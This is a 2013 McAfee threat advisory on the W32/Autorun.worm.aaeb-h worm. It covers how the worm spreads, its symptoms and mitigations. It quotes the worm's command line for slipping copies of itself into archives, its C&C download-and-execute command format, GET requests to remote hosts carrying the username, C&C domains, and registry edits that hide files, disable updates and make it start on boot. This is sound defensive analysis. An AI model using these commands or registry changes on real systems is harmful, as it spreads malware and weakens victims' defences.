Summary McAfee Labs Threat Advisory W32/Autorun.worm.aaeb-h August 9, 2013 W32/Autorun.worm.aaeb-h has the ability to infect removable media devices, as well as mounted network shares. Infection starts either with manual execution of the infected file or by simply navigating to the folders that contain the infected files, whereby the Autorun.inf file could cause automatic execution of the malware. It could also add copies of itself in.zip and.rar archive files. It will also download other malwares or updates to itself directed by the C&C server. Detailed information about the worm, its propagation, and mitigation are in the following sections: Infection and Propagation Vectors Characteristics and Symptoms Restart Mechanism Getting Help from the McAfee Foundstone Services team Infection and Propagation Vectors W32/Autorun.worm.aaeb-h spreads by creating copies of itself in removable storage devices and mounted network shares. It will also create an autorun.inf to allow it to automatically execute itself when attached to another system with autorun enabled. It changes the attributes of the directories in the affected drive to hidden and creates copies of itself with the same filename as the hidden directory. It checks files with the following extensions in the removable drives, changes its attributes to hidden, and creates copies of itself with the same filename as the hidden file: mp3 avi wma wmv wav mpg mp4 doc txt pdf xls jpg jpe bmp gif tif png It makes sure that the hidden files will remain hidden in Explorer by setting the ShowSuperHidden registry value to 0: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden = dword:00000000
It creates copies of itself with the following filenames: Secret.exe Sexy.exe Porn.exe Passwords. Exe Runme.exe *gy.exe..exe.exe Users may then unknowingly open the malware files. It will drop the following 0 byte file in the removable device: x.mpeg It will add a copy of itself in.zip and.rar files found on the system. It will check for Winrar on the system and use the rar.exe command line tool to add a copy of itself on the.zip or.rar file found. Execute Rar.exe with the following command line: Rar.exe a -y -ep -IBCK "<rar/zip file found>" "%userprofile%\secret.exe" The added malware copy in the affected archive has the filename Secret.exe. Mitigation Disable the Autorun feature on Windows. You can do this remotely using Windows Group Policies. Restrict the use of USB drives in mission-critical and server machines. Create an access protection rule to prevent modification of the ShowSuperHidden registry key listed above. Implement and test Access Protection Rules using VirusScan Enterprise to prevent writing of AUTORUN.INF files. Characteristics and Symptoms Description Upon execution it creates a copy of itself to the following path: %UserProfile%\[random].exe Note: %UserProfile% refers to the current user s profile folder. It changes several bytes in the newly created file in an attempt to avoid anti-virus detection. It then connects to a command and control server to receive commands. Upon connection, the server automatically sends out the command. Currently the command sent is to download and execute files from the URL given. Command structure observed: :.dl [URL] [filename] Example command sent by the C&C server: :.dl http://<random 6 numbers>.zdns.eu:443/qjvdpnruwp?f google.com :.dl http://ks<random 7 numbers>.kimsufi.com New variants observed have an encrypted communication with the server.
When the malware receives the above command, it will attempt to download and then execute the downloaded file. The payload files that were observed so far are mostly Zbot and BackDoor families. This is frequently updated in the server. Http GET request sent out by the malware when downloading the malicious file pointed by the server: Host: <random 5-digit number>.noip1.de:443 Host: <random 5-digit number>.noip1.nl:443 Host: <random 5-digit number>.zdns.eu GET /2/?<randomletter> [USERNAME] HTTP/1.1 Host: <random 5-digit number>.noip1.at GET /0/?<randomletter> [USERNAME] HTTP/1.1 Host: <random 5-digit number>.noip1.at GET /uyvsutnie?f HTTP/1.1 Host: 72010.noip.at Note: The URL where it downloads for updates or additional malware will vary depending on the C&C. The following are the observed domains of the C&C servers: Ns1.helpupdater.net ns1.helpupdater.net ns1.helpchecks.net ns1.helpupdated.com ns1.helpupdated.net ns1.helpupdated.org ns1.helpupdatek.at ns1.helpupdatek.eu ns1.helpupdatek.tw ns1.helpupdater.net ns1.helpupdates.com ns1.helpupdated.co ns1.helpupdated.ne ns1.helpupdated.or ns1.helpupdatek.a ns1.helpupdatek.e ns1.thepicturehut.net ns1.player1253.com ns1.videoall.net ns1.mediashares.org ns1.helpchecks.net ns1.couchness.com ns1.chopbell.net ns1.chopbell.com ns1.helpupdated.net ns1.helpupdated.org ns1.helpupdatek.at ns1.helpupdatek.eu
ns1.helpupdatek.tw existing.suroot.com 22231.dtdns.net ns1.helpchecks.com ns1.cpuchecks.com ns1.timedate1.com ns1.timedate1.net ns1.timedate1.org ns1.timedate2.com ns1.timedate2.net ns1.timedate2.org ns1.timedate3.com ns1.timedate3.net ns1.timedate3.org ns1.boxonline1.com ns1.boxonline1.net ns1.boxonline1.org ns1.boxonline2.com ns1.boxonline2.net ns1.boxonline2.org ns1.boxonline3.com ns1.boxonline3.net ns1.boxonline3.org The following are the observed C&C server TCP ports where the malware connected to: port 8002 port 8000 port 443 port 80 port 3128 port 47221 port 9004 port 9904 port 7005 The malware also randomly uses domain suffixes with the following strings:.com.net.org.biz.info.at.eu.by This malware will disable the Windows update by setting the NoAutoUpdate registry value to 1: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU NoAutoUpdate = dword:00000001 This malware will also prevent any process that contains the strings proc and task in its filename from terminating the malware process by patching the RET instruction onto the first instruction of TerminateThread and TerminateProcess functions. Mitigation Users are requested to exercise caution while opening unsolicited emails and unknown files. Users are advised to update Windows and third-party application security patches and virus definitions on a regular basis and have proper filtering rules: If possible, block access to the ports and monitor and block mentioned URLs. If possible, block access to any HTTP request having the exact user-agent string as Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) Create an access protection rule to restrict file dropping to the aforementioned folder.
Create an access protection rule to prevent file execution from the %UserProfile% folder. Create an access protection rule to prevent modification to the NoAutoUpdate registry key listed above. Access Protection must be ON and proper rules must be set to get to know which process is actually responsible for changing the attributes of files and folders. Restart Mechanism Description The following registry entry would enable the trojan to execute every time when Windows starts: <malware name> = %UserProfile%\<Random name>.exe /e" <malware name> = %UserProfile%\<Random name>.exe /c" <malware name> = %UserProfile%\<Random name>.exe /h" <malware name> = %UserProfile%\<Random name>.exe /p" Getting Help from the McAfee Foundstone Services team This document is intended to provide a summary of current intelligence and best practices to ensure the highest level of protection from your McAfee security solution. The McAfee Foundstone Services team offers a full range of strategic and technical consulting services that can further help to ensure you identify security risk and build effective solutions to remediate security vulnerabilities. You can reach them here: https://secure.mcafee.com/apps/services/services-contact.aspx 2011 McAfee, Inc. All rights reserved.